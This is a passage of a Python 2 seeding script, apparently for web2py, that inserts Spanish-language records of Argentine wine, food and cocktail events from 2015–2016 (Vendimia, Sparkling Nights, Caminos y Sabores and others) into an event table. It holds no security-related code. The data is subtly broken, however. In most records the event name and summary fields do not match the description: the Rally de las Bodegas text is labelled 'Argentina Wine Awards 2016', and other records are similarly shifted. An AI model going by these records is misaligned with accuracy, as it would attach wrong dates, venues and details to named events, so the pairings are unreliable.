Algunas de las bodegas que participarán en esta edición 2016 son las siguientes: Chandon, Norton, Catena Zapata, Casa Bianchi, Salentein, Altavista, Rosell Boher, Luigi Bosca, Freixenet, Argento, Estancia Mendoza , Navarro Correas, Familia Schroeder, Trapiche, Sophenia, Nieto Senetiner, Vistalba, Las Perdices, Finca La Linda, La Riojana, Secreto Patagónico, Dante Robino, Familia Zuccardi y Sáenz Briones, entre otras.
Sparkling Nights también ofrecerá a los asistentes la posibilidad de degustar una amplia variedad de delicatessen y productos gourmets: habrá quesos, sushi, patisserie, infusiones, chocolates y finger foods.
La entrada cuesta 420 pesos y con la misma se entrega una copa de champagne para la degustación.''', nombre = 'FIESTA NACIONAL DE LA VENDIMIA 2016',caracteristicas= ' 80ª Fiesta Nacional de la vendimia, conmemora el esfuerzo y trabajo del viñatero mendocino. Diez noches de espectáculos con la inclusión de shows de nivel nacional, ceremonias y visitas a bodegas y viñedos. Los principales actos programados son ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18377_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('17/3/2016',fdate),
fecha_fin=datetime.strptime('19/3/2016',fdate), direccion='Mendoza', detalle='''El Rally de la Bodegas en su 14ª Edición consecutiva, organizado por el CLUB MENDOZA CLÁSICOS & SPORT es uno de los eventos de mayor importancia de autos históricos del país. Comenzó una nueva etapa con el acuerdo alcanzado con CLARAMUNT GARAGE que realza el culto por el automovilismo histórico en un marco de curada hospitalidad.
El RDLB es un evento que fusiona la pasión por los autos clásicos sport, las rutas del vino con sus modernas e innovadoras bodegas y los más espectaculares paisajes mendocinos.
Un acontecimiento de nivel internacional en el que los participantes disfrutan de toda la excelencia de esta competencia en el marco ideal que brinda la Cordillera de Los Andes.
Viñedos, gastronomía gourmet al pie de la montaña y exhibiciones de Polo, son parte del atractivo que conjugan una exigente competencia con un evento social de alto nivel.
Circuitos de montaña absolutamente de asfalto, especiales entre los viñedos, siempre en el ámbito de la regularidad, manteniendo promedios inferiores a 50 km/h.
La Fédération Internationale des Véhicules Anciens (FIVA) ha incluido el evento a su calendario internacional, compartiendo así con las manifestaciones de mayor relevancia de todo el mundo. Sólo automóviles sport, con su pasaporte de homologación FIVA son aceptados a participar del evento.
Este rally es puntuable para el Campeonato Argentino de Regularidad Sport del ACA y la Triple Corona, para el piloto de mejor performance entre el Rally de las Bodegas, el Rally de la Montaña y las 1000 Millas Sport.''', nombre = 'ARGENTINA WINE AWARDS 2016',caracteristicas= ' Planeado para evaluar y premiar la calidad y los avances de la industria vitivinícola argentina, el Argentina Wine Awards ha ganado su lugar como el certamen más importante en la agenda local y gana cada vez más adeptos de otros rincones del mundo ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18397_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('28/2/2016',fdate), fecha_fin=datetime.strptime('8/3/2016',fdate), precio='Desde $80.', direccion='Ciudad de Mendoza', detalle='''80ª Fiesta Nacional de la vendimia, conmemora el esfuerzo y trabajo del viñatero mendocino. Diez noches de espectáculos con la inclusión de shows de nivel nacional, ceremonias y visitas a bodegas y viñedos. Los principales actos programados son los siguientes:
• 28 Febrero (Domingo): “Bendición de los Frutos”. Ceremonia donde se agradece a Dios los frutos sanos obtenidos de la cosecha. Se ofrece el vino nuevo procediéndose al “Golpe en la Reja del Arado”, que simboliza al hombre que labra la tierra, bajo la advocación de la Virgen de la Carrodilla y la bendición del fruto nuevo.
• 4 Marzo (Viernes): “Vía Blanca de las Reinas”. Desfile de carros alegóricos lumínicos que transportan a las reinas tanto salientes como aspirantes al cetro nacional.
• 5 Marzo (Sábado): “Carrusel de la Vendimia”. Por la mañana desfilan los mismos carruajes, pero escoltados por agrupaciones gauchas con trajes típicos, montados a caballo, destacándose la tradicional carreta tirada por bueyes.
• 5 Marzo (Sábado): “Acto Central”. Espectáculo donde se realizan bailes folclóricos con más de mil bailarines en el escenario, representaciones artísticas, juegos de luces y sonido. Tiene lugar la elección y coronación de la reina nacional vendimial. Termina con un espectáculo de fuegos artificiales lanzados desde el “Cerro de la Gloria”.
• 6 Marzo (Domingo): “Segunda Noche”. Se repite el espectáculo artístico del Acto Central pero sin la elección de la reina nacional de la vendimia. Se presentan actuaciones en vivo de artistas reconocidos a nivel nacional e internacional.
• 7 Marzo (Lunes): “Tercera Noche”. Repetición del Acto Central con actuaciones en vivo de reconocidos artistas.
• 8 Marzo (Martes): “Cuarta Noche”. Repetición del Acto Central con actuaciones en vivo de reconocidos artistas.
Más información: www.mendoza.gov.ar"''', nombre = 'JUMBO DELI & WINE 2015',caracteristicas= ' Tribuna Plaza será nuevamente la sede de la tradicional Feria Jumbo Deli & Wine, que cumple su cuarto año consecutivo en Buenos Aires, presentando toda la propuesta gourmet y productos premium que ofrece en sus góndolas durante todo el año. U ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18424_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('4/11/2015',fdate), fecha_fin=datetime.strptime('6/11/2015',fdate), precio='$224', direccion='Hotel Panamericano de la Ciudad de Buenos Aires.', detalle='''Sparkling Nights es la única feria de la Argentina dedicada exclusivamente a los espumantes.
Durante tres días, 40 de las bodegas más prestigiosas de la Argentina ofrecerán a los amantes del champagne la posibilidad de degustar más de 200 variedades, para conocer las últimas tendencias y todas las novedades que ofrece este año el creciente mercado de los vinos espumantes.
La cita será en el elegante Hotel Panamericano de la Ciudad de Buenos Aires, del 4 al 6 de Noviembre, entre las 18 y las 23 horas.
Algunas de las bodegas que participarán en esta edición son las siguientes: Chandon, Norton, Catena Zapata, Casa Bianchi, Familia Zuccardi, Altavista, Cruzat, Rosell Boher, Mumm, Luigi Bosca, Séptima, Argento, Dante Robino, Alamos, Estancia Mendoza, Familia Schroeder, Finca Las Moras, Amalaya, Casarena, Nieto Senetiner, Las Perdices, La Riojana, Secreto Patagónico, Humberto Canale y Domaine Bousquet, entre otras.
Sparkling Nights también ofrecerá a los asistentes la posibilidad de degustar una amplia variedad de delicatessen y productos gourmet: habrá quesos, sushi, patisserie, café, chocolates y finger foods.
Sparkling Nights es organizada por Planeta Joy, el sitio de gastronomía, vinos y lifestyle más prestigioso de la Argentina."''', nombre = 'SPARKLING NIGHTS 2015',caracteristicas= ' Sparkling Nights es la única feria de la Argentina dedicada exclusivamente a los espumantes. Durante tres días, 40 de las bodegas más prestigiosas de la Argentina ofrecerán a los amantes del champagne la posibilidad de degustar más de 200 var ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18448_default_medium.jpeg','rb'))
except Exception as e:
print e
return True
def c():
from datetime import datetime
fdate='%d/%m/%Y'
try:
db.evento.insert(
fecha=datetime.strptime('7/9/2015',fdate), precio='Únicamente con invitación', direccion='Algodon Mansion, Montevideo 1647, CABA', detalle='''Llega la tercera edición de la Feria de Vinos de San Rafael. El próximo lunes 7 de septiembre tendrá lugar la tercera edición de la Feria de Vinos de San Rafael, con el objetivo que esta emblemática región de la producción de vinos de nuestro país se ha propuesto desde sus inicios: acercar su identidad al público de Buenos Aires, a representantes de los puntos de venta y a la prensa especializada, consolidando su posicionamiento. Por tercer año consecutivo, las principales bodegas de dicha región se reúnen en un solo lugar para compartir sus novedades y los sabores de su terroir.
El encuentro tendrá lugar el lunes 7 de septiembre en Algodon Mansion, Montevideo 1647, en diferentes horarios según el público y con invitación exclusiva. Las bodegas participantes son Bodega Alfredo Roca, Algodon Wine Estates, Bodegas Lavaque, Bodega Bombal y Aldao, Finca Dinamia, Funckenhausen Vineyards, Bodega Goyenechea, Bodegas Iaccarini, Bodega Jean Rivier, Casa Bianchi, FOW-Fabricio Orlando Winemaker y Bodegas Suter, que nuevamente ofrecerá en la barra innovadores cocktails a base de vino, uno de los hits de la edición 2014. Como novedad, se suma la bodega Mumm Domain, uno de los prestigiosos exponentes de los productores de espumantes de alta gama que la región brinda al mercado.
Características del terroir
San Rafael es un terroir con más de dos siglos de historia y con características que lo hacen único: su ubicación en el sur mendocino; clima templado continental semiárido y una marcada amplitud térmica; una moderada cercanía con la Cordillera de los Andes, que lo convierte en tributario de las aguas provenientes de los ríos Atuel y Diamante, conducidas por sistemas de riego y acequias creadas por la industriosa mano mendocina y que a la vez asegura el reparo de las fuertes heladas; la altura sobre el nivel del mar, que oscila entre los 600 y los 800 m; escasas precipitaciones y baja humedad ambiente, junto a suelos profundos, permeables y pobres en materia orgánica; una gran proporción de días soleados. Finalmente su gente, el mayor de sus tesoros, que continúa una larga tradición vitivinícola y el amor al vino y a su tierra en el sur de la provincia de Mendoza. Todas condiciones decisivas para el logro de vinos de excelencia.
La presencia de bodegas familiares también es parte de la identidad de esta zona, con sus establecimientos, sus tradiciones y sus productos, que se ha adaptado a las exigencias de los mercados y los consumidores actuales, sin abandonar sus mejores prácticas.
DATOS
Fecha: lunes 7 de septiembre de 2015
Lugar: Algodon Mansion, Montevideo 1647, CABA.
Entradas: únicamente con invitación.
Horario de trade y sommeliers: 14 a 16 hs
Horario de prensa: 16 a 18 hs
Horario de invitados especiales: 18 a 21 hs."''', nombre = 'VINOS Y BODEGAS 2015',caracteristicas= ' Una nueva experiencia para los sentidos llega a La Rural de la mano de Vinos y Bodegas. Del 24 al 26 de septiembre, de 18 a 23hs. en el Pabellón Frers, más de 40 bodegas argentinas presentarán sus novedades y productos, en un espacio especialmente ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18450_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('14/8/2015',fdate), fecha_fin=datetime.strptime('16/8/2015',fdate), direccion='Municipalidad de Bragado. Alsina 178, Bragado.', detalle='''En agosto llega la décima edición de la exposición de vinos más reconocida del interior del país. Una propuesta cultural, turística y enogastronómica única en la provincia de Buenos Aires.
Expovinos Bragado continúa con su objetivo de acercar el mundo del vino y el buen vivir al interior del país, generando un espacio de disfrute, promoción y divulgación. Del 14 al 16 de agosto, la décima edición de la exposición de vinos más reconocida tendrá lugar en el Palacio Municipal de Bragado (Alsina 178, Bragado, Provincia de Buenos Aires).
Durante tres días los visitantes de Expovinos Bragado podrán disfrutar de las etiquetas de más de 20 bodegas, productos gourmet, aceites de oliva, un espacio de alta gama con etiquetas Premium, un almacén de promociones con importantes descuentos, muestras de arte y más.
Además, en las vísperas de la feria se podrá disfrutar de ciclos de música y teatro, un encuentro de ceremonial y protocolo, el abierto de vinos y golf, y el imponente “Cóctel a orillas del viento”, un evento en el Club Náutico de Bragado. Con la laguna como marco, vinos, espumosos y una selección de productos gourmet para disfrutar al aire libre.
Estarán presentes aportando su energía y buen humor, Juan Braceli y Juan Ferrara de Cocineros Argentinos, realizando demostraciones de cocina.
Comprometidos con el municipio, parte de lo recaudado será a total beneficio de una institución bragadense. Además, continúa la campaña de concientización “Beber con estilo”, que promueve la cultura de la responsabilidad y moderación al beber.
Más información en www.expovinosbragado.com.ar"''', nombre = 'VINOS DE SAN RAFAEL',caracteristicas= ' Llega la tercera edición de la Feria de Vinos de San Rafael. El próximo lunes 7 de septiembre tendrá lugar la tercera edición de la Feria de Vinos de San Rafael, con el objetivo que esta emblemática región de la producción de vinos de nuestro ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18517_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('17/8/2015',fdate), fecha_fin=datetime.strptime('22/8/2015',fdate), direccion='Ciudad de Buenos Aires', detalle='''Del 17 al 22 de agosto, Buenos Aires tendrá su primera semana dedicada a la coctelería. Una propuesta que reúne a más de 40 bares y restaurantes, decenas de bartenders, centenares de tragos a precios promocionales, clases maestras, conferencias, recorridos de bares y degustaciones. Un nuevo evento cultural en la agenda porteña, que busca reconocer a la ciudad como la gran capital sudamericana de la coctelería.
La coctelería es un hito cultural, que atraviesa a la ciudad en múltiples escenarios. En sus bares y restaurantes, en los hoteles y en los hogares, en la televisión y en la radio, en los libros y en las revistas. En encuentros de amigos y en fiestas, en la previa de un asado y como relax de after office.
Todo esto confluye en Buenos Aires Cóctel:
- A lo largo de una semana, los mejores bares de la ciudad ofrecerán una carta especial de cócteles propios a valores promocionales, en la búsqueda acercar al público a la coctelería y a los bares, para que conozca y disfrute las mejores mezclas y bebidas.
- Cada día se sucederán clases maestras para amateurs y aficionados que quieran aprender sobre el mundo de las bebidas, además de múltiples eventos lúdicos y educativos en los bares participantes.
- Se suma una jornada de charlas y conferencias en la Universidad de Palermo, dirigida específicamente a profesionales, bartenders, gastronómicos y estudiantes, sobre los distintos aspectos que hacen al trabajo de la barra, la creación de un bar, el diseño de una marca, los procesos de destilación, entre otros temas.
- Todo bajo el concepto de consumo responsable, parte inherente del disfrute y del aprendizaje, con actividades especiales, comunicación específica y sugerencias de recorridos a pie.
Buenos Aires Cóctel. Del 17 al 22 de agosto, en toda la ciudad porteña.
Con el apoyo del Ente de Turismo de la Ciudad de Buenos Aires, la Universidad de Palermo y las empresas Grupo Cepas, Pernod Ricard, Diageo, Gruppo Campari, Moët Hennessy, Mitre Fortín, Phaedrus, CCU, Familia Zuccardi, Fratelli Branca y Catena Zapata.''', nombre = 'TERROIR CON HISTORIA 2015',caracteristicas= ' Del 17 al 22 de agosto, Buenos Aires tendrá su primera semana dedicada a la coctelería. Una propuesta que reúne a más de 40 bares y restaurantes, decenas de bartenders, centenares de tragos a precios promocionales, clases maestras, conferencias, ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18521_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('9/7/2015',fdate), fecha_fin=datetime.strptime('12/7/2015',fdate), precio='$80', direccion='La Rural - Av. Sarmiento 2704 - Palermo – Buenos Aires', detalle='''La feria Caminos y Sabores 2015 se realizará del 9 al 12 de julio en el predio de La Rural, en Buenos Aires. Las entradas ya están a la venta.
Caminos y Sabores es, más que una feria, una forma de apreciar nuestro país. Desde el jueves 9 al domingo 12 de julio de 2015 la principal feria que nuclea expositores de alimentos y artesanías de todo el país se desarrollará en dos pabellones de La Rural, en Buenos Aires.
Como desde hace once años, la feria Caminos y Sabores expone las raíces gastronómicas y culturales argentinas de la mano de productores y artesanos provenientes de todas las regiones del país.
En Caminos y Sabores el público puede acceder de primera mano a la historia de un determinado producto en el cual intervienen muchos protagonistas, familias y colaboradores, en una red de labores que se ha transmitido de generación en generación. Es así que una receta familiar se ve transformada en un producto regional al alcance del público.
Las Novedades/ Mucho más que un paseo de compras
En Caminos y Sabores 2015 se presenta un nuevo espacio gastronómico llamado “Maestros del Pan”, donde especialistas de la firma Calsa dispondrán sus conocimientos en materia de panificación para que en vivo y en directo elaboren panificaciones de la mejor calidad.
El rincón donde los cinco sentidos se concentran en la diversidad de aromas, colores y sabores para disfrutar de platos con fuerte raigambre en cada pueblo del interior siguen siendo la Cocina y el Taller de Elaboración de Alimentos regionales. Allí, dentro de una escenografía mágica que replica lo cotidiano, el público se deleita y aprende de los mejores representantes de cada región del país. A veces las aves, otras los frutos de mar, cuando no los cabritos, corderos y cerdos, siempre condimentados con los mejores frutos de las sierras, fortalecen el alma, recorriendo todo el cuerpo hasta llegar a la degustación y el aplauso merecido a los mejores expositores.
También sorprende en Caminos y Sabores 2015 la Plaza del Encuentro, un espacio donde se celebra la cultura a través de espectáculos representativos de la identidad de nuestro país y las tan vistosas Huertas, para que los visitantes puedan disfrutar del placer de cultivar desde el hogar.
La frutilla del postre viene de la mano del Concurso Experiencias del Sabor. Organizado por la Consultora STG, este concurso tiene como objetivo reconocer la calidad de aquellos productos que participan de la exposición y de premiar la excelencia del trabajo desarrollado durante todo el año. El jurado del Concurso, integrado por un panel de testeadores no videntes, está especializado en el análisis sensorial de alimentos.
Datos importantes:
Fecha: del 9 al 12 de julio de 2015
Horario: de 12 a 21 hs.
Lugar: La Rural - Av. Sarmiento 2704 - Palermo – Buenos Aires
Venta de entradas: En boletería de La Rural de 11:30 a 20:30 y on line en ticketek.com.ar
Valor de la entrada: $ 80 Menores de 5 años NO abonan entrada.
Descuentos y bonificaciones (exclusivos para el VIERNES 10 DE JULIO)
Jubilados: 2×1
Escuelas de Cocina: Vení vestido con tu chaqueta y obtené 2×1 en entradas
Estudiantes universitarios y terciarios de carreras afines (Gastronomía, hotelería, turismo, ingeniería en alimentos, etc.): 2×1 presentando libreta o constancia de alumno regular.
Escuelas primarias, sin cargo previa acreditación. Enviar previamente a la Organización una carta membretada con listado de alumnos, docentes a cargo (incluir N° de teléfono celular) con sello de la Institución. Enviarlo con anticipación al mail infocaminosysabores@caminosysabores.com.ar y llamar telefónicamente al (011) 5128 9800. Al ingresar a la feria, presentar el listado original en la zona de boleterías."''', nombre = 'BUENOS AIRES CÓCTEL 2015',caracteristicas= ' En agosto llega la décima edición de la exposición de vinos más reconocida del interior del país. Una propuesta cultural, turística y enogastronómica única en la provincia de Buenos Aires. Expovinos Bragado continúa con su objetivo de ace ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18602_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('6/6/2015',fdate), direccion='Hotel NH Tango. Ciudad de Buenos Aires.', detalle='''Quinta edición de la cata de vinos que busca juntar en una misma mesa a enólogos, sommeliers, especialistas, comunicadores y consumidores apasionados, para que en un ambiente distendido, aprendan unos de otros y en conjunto ayuden a difundir la cultura del vino. Como siempre, el gran objetivo es quitarle la solemnidad a la cata, volver a la esencia, disfrutar del vino y analizar sencillamente cual es el que gusta más. En 2011, el evento se realizó en torno al Malbec en el restaurante a puertas cerradas Treinta Sillas. Su repercusión sobrepaso las mejores expectativas: 30 cubiertos y 34 muestras diferentes de Malbec. En 2012, el tema fueron los Blends y en el restaurante Laurak Bat se reunieron 50 personas para degustar un total de 49 etiquetas de las diferentes regiones Argentinas. En 2013, nuevamente con el Malbec, 90 degustadores pudieron disfrutar de 64 etiquetas de Alta Gama en una inolvidable noche en el Hotel NH Tango. En 2014 fue el turno de los Cabernet (Sauvignon y Franc), donde 94 degustadores pudieron disfrutar de mas de 70 muestras de los distintos Cabernet que se dan en la Argentina. Este año la temática será nuevamente el Malbec. Nuestra cepa insignia, la que nos identifica en el mundo, la que podemos encontrar desde la Patagonia hasta los Valles Calchaquíes, con sus características propias y las que le imprime el terruño. El Desafío Federal 2015 se llevará a cabo el sábado 6 de Junio nuevamente en el Hotel NH Tango y constará de la cata a ciegas de 75 etiquetas de Malbec de alta gama, divididos en 3 categorías según su precio sugerido de venta al público. Como siempre, la cata será seguida de una de una cena distendida acompañada por los mismos vinos durante la cual se anunciarán los 6 preferidos de cada categoría. Este año, en el Desafío Federal también se premiará a la etiqueta más atractiva de todas las que serán degustadas, para de alguna manera premiar el esfuerzo y la creatividad de nuestros diseñadores, quienes también aportan con su trabajo a la venta y difusión de nuestros Malbec. Además en el mes de Julio se realizará la entrega de los diplomas a las bodegas que resulten premiadas, a la que serán invitadas las bodegas participantes y el periodismo a probar los 6 vinos premiados de cada categoría. Los 95 privilegiados que lograron conseguir una plaza para participar como degustadores (las mismas se agotaron en 72 horas) tendrán la oportunidad de degustar 75 muestras de malbec de entre 90 y 1100 pesos habrá exponentes de 8 provincias diferentes (Mendoza, Salta, Neuquén, Río Negro, Córdoba, La Rioja, Tucumán y La Pampa). Las bodegas que han confirmado su participación en el Desafío Federal 2015 son: Achaval Ferrer, Aleanna, Alta Vista, Altocedro, Altos las Hormigas, Amalaya, Atamisque, Bodega del Desierto, Bodega del Fin del Mundo, Bodega Enrique Foster, Bodega Posse, Bodega Séptima, Bodega SinFin, Bodega Toneles, Carinae, Chakana, Chaman, Clos de Chacras, Dante Robino, Domingo Molina, Dominio del Plata, Doña Paula, Durigutti, El Esteco, El Porvenir de Cafayate, Ernesto Catena Vineyards, Etchart, Familia Cassone, Finca Decero, Finca la Anita, Finca las Moras, Finca Sophenia, Gimenez Riili, Goyenechea, HDWines, Humanao, Impaciente, Insolente, Javier Collovati, Kaiken, Krontiras, La Mascota, Lagarde, Lamadrid, Las Perdices, Margot, Matías Riccitelli, Mauricio Lorca, Melipal, Miras, Mosquita Muerta Wines, Nieto Senetiner, Noble de San Javier, Norton, NQN, O. Fournier, Piatelli, Renacer, Pulenta Estate Riglos, Santonegro, Teho, Tempus Alba, Terrazas, Tintonegro, Trapiche, Trivento, Vicentin, Videla Dorna, Viña 1924 de Angeles, Viña Vida, Vistalba, Zorzal Wines y Zuccardi. Para más información comunicarse vía mail a info@eldesafiofederal.com.ar "''', nombre = 'EXPOVINOS BRAGADO 2015',caracteristicas= ' Del 24 al 26 de julio próximo, en Espacio Pilar (Chile 1963 – salida km 47 de Panamericana), vuelve la celebración gastronómica para disfrutar del “buen comer y beber”, probar –y comprar- ingredientes que transforman una comida en un plat ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18656_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('1/7/2015',fdate), fecha_fin=datetime.strptime('3/7/2015',fdate), precio='$350', direccion='JA Vinoteca, Borges 1772, Palermo, CABA.', detalle='''La fuerza de la historia unida a una nueva generación de enólogos que cambiaron para siempre el rumbo de la vitivinicultura local. Matias Michelini: Passionate Wine - SuperUco Gerardo Michelini: Gen del Alma - SuperUco Juan Pablo Michelini: SuperUco Manuel Michelini: Plop Andrea Mufatto: Gen del Alma Luis Reginato: Chaman Wines - Reginato Espumantes David Bonomi: Tierra Inti - Per Se Edgardo Del Popolo: Per Se Ariel Angelini: Tupun Francisco Bugallo: Cara Sur Pablo Bassin: Fuego Blanco En formato de feria, 11 enólogos, más de 80 vinos y sus últimas creaciones Cuándo?: 1, 2 y 3 de Julio – 17 a 22hs Dónde?: JA Vinoteca, Borges 1772, Palermo, CABA Solo 80 entradas por día - Valor: $350 Puntos de Venta: Ozono Drinks - La Rioja 1823, Parque Patricios Vinoteca Taninos - Araoz 1227, Palermo JA - Borges 1772, Palermo Mr. Wines - Aranguren 1078, Caballito Alma de los Andes - Calle 44 nro. 857, La Plata Online: www.ozonodrinks.com.ar"''', nombre = 'ESPACIO GOURMET 2015 - SEGUNDA EDICIÓN',caracteristicas= ' La feria Caminos y Sabores 2015 se realizará del 9 al 12 de julio en el predio de La Rural, en Buenos Aires. Las entradas ya están a la venta. Caminos y Sabores es, más que una feria, una forma de apreciar nuestro país. Desde el jueves 9 al d ...,', imagen = open('C:\\imagenes\\eventos\\thumb_51494_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('24/7/2015',fdate), fecha_fin=datetime.strptime('26/7/2015',fdate), precio='$50.-', direccion='Espacio Pilar Av. Chile 1963 Panamericana Ramal Pilar km 47', detalle='''
Del 24 al 26 de julio próximo, en Espacio Pilar (Chile 1963 – salida km 47 de Panamericana), vuelve la celebración gastronómica para disfrutar del “buen comer y beber”, probar –y comprar- ingredientes que transforman una comida en un plato inolvidable. Esta 2ª edición cuenta con el apoyo de la Municipalidad de Pilar y con el auspicio de Banco Provincia, que ofrecerá beneficios especiales para sus clientes.
En Espacio Gourmet, los Food Trucks estarán a la orden del día. Propuestas divertidas con diferentes variantes de cocina: árabe, mexicana, rápida, jugos de frutas con combinaciones exquisitas. Participan B.A. Foodtruck, María Félix, Moros en la Costa, Bonnyuzz, entre otros.
Los más destacados Chefs de Cuisine de la Escuela de Cocineros Gato Dumas ofrecerán clases abiertas para develar los “secretos” aun de los platos más sencillos y comunes, para que sean apreciados como el manjar más exquisito.
En el mercado se podrán descubrir y obtener los ingredientes más curiosos para que la comida de todos los días sea también especial: Gaby Matchel con sus mermeladas y chutneys también presentará su nuevo servicio de delivery, las pastas de grano duro de Paese di Sapore, las variedades más deliciosas de Quesoteca Burgos, Cervezas Jarva con sus sabores únicos, Vegie Milk y sus leches gourmet, Tea Me con los blends más originales, la propuesta más gourmet de productos para celíacos, entre otros. Utensilios y elementos originales de Ollas Essen, Metal Real con sus cubiertos, la artista plástica María Laura Pini con su “vajilla de autor”, los hornos artísticos de Cuisine, la artista textil Nadine Youssefian que auspiciada por Colibrí llevará sus manteles intervenidos, entre otros.
Además, como en la primera edición, Gorros Wine prepara “Los Caminos del Vino”, un paseo en el que se podrán degustar los vinos de las cepas más exclusivas. Un programa imperdible.
En el restaurante Los visitantes podrán disfrutar también las propuestas gourmet de Jean Paul Bondoux y Jérôme Mathe con su “Cuisine du Sud”, así como las de Art Catering, Tree Cocina, Brazzi Catering, Crepas, La Arepería de Buenos Aires, Pancho Bonito, GuiLab Laboratorio de Helados con sus helados moleculares realizados con nitrógeno líquido a la vista del público.
Arte PHOS y el Ente de Promoción de la Municipalidad de Pilar presentarán las fotografías ganadoras del concurso “La Sal de la Vida”, el primer concurso fotográfico de gastronomía gourmet, una especialidad muy particular en fotografía. Se convoca a mayores de 18 años, residentes en el territorio nacional, amantes de la fotografía y la gastronomía, profesionales y/o amateurs, que pueden presentar fotos sacadas con cualquier dispositivo sobre platos, ingredientes, presentaciones de gastronomía gourmet. Inscripción hasta el 6 de julio de 2015. Bases e informes en Facebook: La Sal de la Vida.
Dado que esta edición de Espacio Gourmet se realiza en plenas vacaciones de invierno, habrá un espacio para chicos con clases de cocina y otras actividades divertidas, especialmente pensadas para el “público menudo”.
Espacio Gourmet está pensada especialmente para un público “bon vivant” que conoce lo que le gusta y, a la vez, está abierto a descubrir nuevos sabores, nuevas texturas, a vivir nuevas experiencias placenteras. Sabores de autor, productos nobles y paladares delicados, todo junto en un solo lugar.
Espacio Gourmet es una propuesta que abarca desde sabores de autor, especias originales, productos nobles, nuevas texturas, nuevas formas de preparar y cocinar ingredientes tradicionales, hasta lo más novedoso en utensilios, mantelería, vajilla y cristalería, accesorios indispensables para enaltecer cualquier comida. Propuestas de maridajes excepcionales. Todo, en un solo lugar."''', nombre = 'CAMINOS Y SABORES 2015',caracteristicas= ' La fuerza de la historia unida a una nueva generación de enólogos que cambiaron para siempre el rumbo de la vitivinicultura local. Matias Michelini: Passionate Wine - SuperUco Gerardo Michelini: Gen del Alma - SuperUco Juan Pablo Michelini: SuperUc ...,', imagen = open('C:\\imagenes\\eventos\\thumb_51495_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('27/4/2015',fdate), direccion='Casal de Catalunya. Chacabuco 863, San Telmo.', detalle='''
En conmemoración a la quinta celebracion del día internacional del Malbec, en el mes de Abril del 2015 les propondremos ser parte de +Wine Edition #2 bajo el slogan: "WE LOVE MALBEC" en donde, como ya es costumbre, contaremos con dos sectores de degustación. SALON ANTONI TAPIES: Vinos rosados tranquilos y espumantes elaborados a base de malbec SALON PAU CASALS: Varietales, blend y fortificados de malbec El lunes 27 el Casal de Catalunya con su imponente edificio sera participe de la muestra de vinos que revoluciona Buenos Aires. "
'''
,nombre = 'MEGA DEGUSTACIÓN ANUAL OZONO DRINKS 2015 - SEGUNDA EDICIÓN',caracteristicas= ' Quinta edición de la cata de vinos que busca juntar en una misma mesa a enólogos, sommeliers, especialistas, comunicadores y consumidores apasionados, para que en un ambiente distendido, aprendan unos de otros y en conjunto ayuden a difundir la cul ...,', imagen = open('C:\\imagenes\\eventos\\thumb_51561_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('18/4/2015',fdate), precio='Venta de Entradas en Vinoteca Vides - Juan B Justo', direccion='Club Italiano (Neuquén Capital),', detalle='''Te invitamos a festejar el MALBEC WORLD DAY. No te lo pierdas este Sábado 18 de Abril en el Club Italiano de la Ciudad de Neuquén."''', nombre = 'DESAFÍO FEDERAL 2015',caracteristicas= ' Alta Gama Rosario vuelve del 4 al 6 de junio de 2015 para brindar por sus 11 años con un recorrido totalmente renovado en el ámbito de Terrazas del Paraná, en La Estación Fluvial de Rosario, presentando una gran cantidad de expositores. En 2015 A ...,', imagen = open('C:\\imagenes\\eventos\\thumb_51719_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('24/9/2015',fdate), fecha_fin=datetime.strptime('26/9/2015',fdate), precio='$200.-', direccion='Predio La Rural. Av. Santa Fe 4363.', detalle='''
Una nueva experiencia para los sentidos llega a La Rural de la mano de Vinos y Bodegas. Del 24 al 26 de septiembre, de 18 a 23hs. en el Pabellón Frers, más de 40 bodegas argentinas presentarán sus novedades y productos, en un espacio especialmente pensado para los amantes del buen beber.
Una propuesta moderna que invita a descubrir las distintas regiones productoras de vinos, a través de sus cepas y la oportunidad única de degustar cada una de ellas. Un encuentro con las nuevas tendencias donde se podrá disfrutar de las catas guiadas por la Escuela de Sommeliers del Gato Dumas, acceder a la tienda de vinos con una selección de etiquetas a cargo de Enogarage y descubrir la cocktelería con vino: bartenders de la ciudad incorporan la bebida a sus barras para la creación de tragos imperdibles que llegan para quedarse.
Los visitantes más foodies también tendrán su lugar en Vinos & Bodegas, a través del mercado gourmet, con productos destacados para transformar cada una de las comidas en verdaderos platos de autor. La propuesta se complementa con un sector de productos orgánicos de primera selección.
En el espacio al aire libre, la gastronomía será la protagonista con propuestas para todos los gustos: bar de tapas y finger food; que se suman a la novedosa propuesta de Food Trucks de La Cabrera, Los Petersen Cocineros, Street Food y Bon Bouquet, que ofrecerán innovadoras opciones de “gastronomía sobre ruedas”.
Peugeot Lounge también se suma a esta tendencia con su food truck y presenta una propuesta de Crepería & Wine Bar: dos grandes tradiciones de la gastronomía francesa se unen en un mix perfecto y llegan a Vinos & Bodegas para que los visitantes disfruten al máximo esta experiencia.
Por su parte Vinómanos, la primera guía mobile en Latinoamérica de vinos argentinos, volverá a estar presente con su plataforma online, que permitirá a todos los visitantes obtener mayor información sobre los productos presentados por cada bodega.
Por segundo año consecutivo, FM One 103.7 musicalizará en vivo el evento, con todos los hits del momento. La experiencia se completa con exclusivos Dj’s Sets y distintas sesiones de live music.
